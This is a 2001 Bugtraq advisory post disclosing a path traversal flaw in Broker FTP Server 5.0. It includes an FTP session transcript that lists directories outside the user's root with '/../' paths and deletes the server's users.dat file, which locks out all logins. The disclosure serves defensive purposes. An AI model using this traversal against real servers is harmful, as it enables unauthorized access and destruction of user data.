Bugtraq mailing list archives
Broker Ftp Server 5.0 Vulnerability
From: se00020 () LION CC
Date: Sat, 3 Mar 2001 18:56:23 -0000
Vulnerability: users can break out of their root directory and list directories. Depending on the priv. you have other commands like delete maybe executed outside of the home. directory. e:\crap\ was used as homedir. deleting files in e:\crap is enabled Detail: Problem: Again relative paths. dir: listings directories outside of root dir. Risc: medium-high 230 User test logged in. ftp> dir 200 Port command successful. 150 Opening data connection for directory list. drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test -rw-rw-rw- 1 ftp ftp 6 Mar 02 12:33 movedtohomedir.txt -rw-rw-rw- 1 ftp ftp 11 Mar 02 00:29 bisontest.txt drw-rw-rw- 1 ftp ftp 0 Mar 03 15:59 HTTP drw-rw-rw- 1 ftp ftp 0 Mar 03 17:05 huhu 226 File sent ok FTP: 323 Bytes empfangen in 0,00Sekunden 323000,00KB/s ftp> cd .. 550 CWD failed. ..: No permission ftp> dir /../experimental/broker/data/ 200 Port command successful. 150 Opening data connection for directory list. -rw-rw-rw- 1 ftp ftp 175 Nov 19 2000 UserGrps.dat -rw-rw-rw- 1 ftp ftp 154 Mar 03 16:54 Users.dat -rw-rw-rw- 1 ftp ftp 0 Mar 03 16:33 Users.4800.bak -rw-rw-rw- 1 ftp ftp 0 Mar 03 16:34 Users.4800-Prof.bak -rw-rw-rw- 1 ftp ftp 31 Mar 03 16:59 BannCtrl.ini -rw-rw-rw- 1 ftp ftp 34 Mar 03 17:08 KickCtrl.ini -rw-rw-rw- 1 ftp ftp 38 Mar 03 16:37 Events_1.dat -rw-rw-rw- 1 ftp ftp 0 Mar 03 16:53 Events_lst_1.dat -rw-rw-rw- 1 ftp ftp 154 Mar 03 16:54 Kopie von Users.dat 226 File sent ok FTP: 629 Bytes empfangen in 0,00Sekunden 629000,00KB/s delete: deleting files outside of root dir. ftp> delete /../experimental/broker/data/users.dat 250 File '/../experimental/broker/data/users.dat' deleted. ftp> quit 221-Thank you for your visit. 221- 221 Goodbye. C:\>ftp 10.17.3.44 Verbindung mit 10.17.3.44 wurde hergestellt. 220 FTP Server ready [***] Benutzer (10.17.3.44:(none)): test 331 Password required for test. Kennwort: 530 Login incorrect. Anmeldung fehlgeschlagen. ftp> :( by deleting users.dat, noone will be able to logon ... put/get commands seem to be secure... This was tested with win2k and trail version of broker ver. 5.0 se00020 () fhs-hagenberg ac at or se00020 () lion cc
Current thread:
- Broker Ftp Server 5.0 Vulnerability se00020 (Mar 04)